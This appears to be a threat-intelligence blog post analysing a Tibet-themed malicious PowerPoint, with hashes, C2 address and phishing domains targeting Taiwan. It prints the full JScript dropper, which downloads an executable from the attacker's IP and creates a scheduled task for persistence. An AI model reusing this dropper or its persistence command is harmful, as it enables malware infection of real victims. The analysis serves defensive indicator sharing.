“Tibet was never a part of China” a pretty accurate statement as “Tibet” was administered by the Princes of Kashmir, but let’s skip the history lesson. Tibet themed malware never seems to stop as this interesting malicious power point appeared:
Tibet-was-never-a-part-of-China.ppsx MD5: 0f74d8a880c638a05ba959c0d5b2fec6 SHA1: af20238714bd795fbacee2ee92fc6806d3b0d77d
The powerpoint decoy uses the actual “Tibet was never a part of China” book from the “Central Tibetan Administration” after the malicious power point is opened up.
After the malicious file is executed on the victim’s computer a network call is made to:
IP: 27.126.188.212 Port: 8005
Once the connection is established a GET request performed:
GET /aqqee HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) Host: 27.126.188.212:8005 Connection: Keep-Alive
Our bad guys send a JScript to the victim after that “GET /” request.
<script language='JScript'> <![CDATA[ function getTempPath(){var wshshell=new ActiveXObject('WScript.Shell');var TempPath=wshshell.SpecialFolders('AppData');TempPath+='\\';return TempPath;};var filepath=getTempPath()+'syshost.exe';function DownURL(strRemoteURL, strLocalURL){var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open("Get",strRemoteURL,false);xmlHTTP.send();var adodbStream = new ActiveXObject("ADODB.Stream");adodbStream.Type = 1;adodbStream.Open();adodbStream.write(xmlHTTP.responseBody);adodbStream.SaveToFile(strLocalURL,2);adodbStream.Close();adodbStream = null;xmlHTTP = null;};DownURL("https://27.126.188.212/2/syshost.exe",filepath);function execShell(cmdstr){var oS = new ActiveXObject('WScript.Shell');var shellcmd = 'cmd.exe /c '+cmdstr;var o = oS.Run(shellcmd,0,false);};execShell('schtasks \/create \/sc minute \/mo 1 \/tn Diagnostic_System_Host \/tr '+filepath); ]]> </script>
Files Dropped:
C:\Users\admin\AppData\Roaming\syshost.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IUJ0G9DA\aqqee[1].wsc
The C2 27.126.188.212 is not cleanest IP in the world as when you dig deeper you end up in the rabbit hole with all sorts of bad stuff. As of today the C2 host the following domains which have been associated with other malware activity:
mondaynews.tk www.peopleoffreeworld.tk newsinfo.wikaba.com bbcnews0.onthewifi.com bbcnews0.sytes.net
The media-related registered domains and dynamic DNS domains with media reference show the actors leveraging media related domains for their campaigns. Another interested domain was registered with this IP, but was recently DNS blackholed by Google:
gmailcom.tw Domain POC: "junru hu" [email protected]
This domain and the other related domains shows an active phishing campaign spoofing GMAIL to target victims in Taiwan and potentially others victims in the regions. The following domains/IP are associated with this campaign:
ssl.m.gmailcom.tw accounts.m.gmailcom.tw verify.dsmtp.com ssl.verify.dsmtp.com cloud.verify.dsmtp.com accounts.verify.dsmtp.com cloudplatform.verify.dsmtp.com mailchek.serveuser.com ssl.mailchek.serveuser.com accounts.mailchek.serveuser.com massistant.3utilities.com mailcheck.serveusers.com. ssl.mailcheck.serveusers.com. accounts.mailcheck.serveusers.com. 27.126.176.239 27.126.191.170 227.126.188.212
Something went wrong with the twitter.